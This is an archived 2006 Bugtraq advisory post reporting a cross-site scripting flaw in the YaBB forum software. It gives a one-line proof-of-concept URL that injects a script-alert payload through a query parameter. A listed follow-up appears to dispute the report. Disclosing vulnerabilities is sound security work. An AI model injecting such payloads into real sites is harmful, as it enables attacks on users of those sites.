Yabb XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Yabb XSS
From: Outlaw@xxxxxxxxxxxxxxxxx
Date: 10 Aug 2006 04:13:34 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

###########################################################################################
#Aria-Security.net Advisory                                                     
          #
#Discovered  by: OUTLAW                                                         
          #
#< www.Aria-security.net >                                                      
          #
#Gr33t to: A.u.r.a  & C0d3r & l2odon & R@1D3N @ DrtRp &                         
          #
###########################################################################################
#Software: YaBB                                                                 
                   
#Attack method: Cross Site Scripting                                            
          
#                                                                               
          
#                                                                               
          
#Proof of Concept:                                                              
          
#                                                                               
          
#index.php?action=faqmy&myfaq=yes&id_cat=1&categories=<script>alert("xss")</script>
       
#                                                                               
          
#----------------------------------------------------------                     
          
#                                                                               
          
#Solution                                                                       
          
#                                                                               
          
#No Solutions                                                                   
          
#                                                                               
          
#Contact : Outlaw@xxxxxxxxxxxxxxxxx                                             
          
#

Follow-Ups:
- Re: Yabb XSS - or NOT
  - From: Volker Tanger

Prev by Date: PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection
Next by Date: TinyWebGallery v1.5 ( image ) Remote Include Vulnerability
Previous by thread: PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection
Next by thread: Re: Yabb XSS - or NOT
Index(es):
- Date
- Thread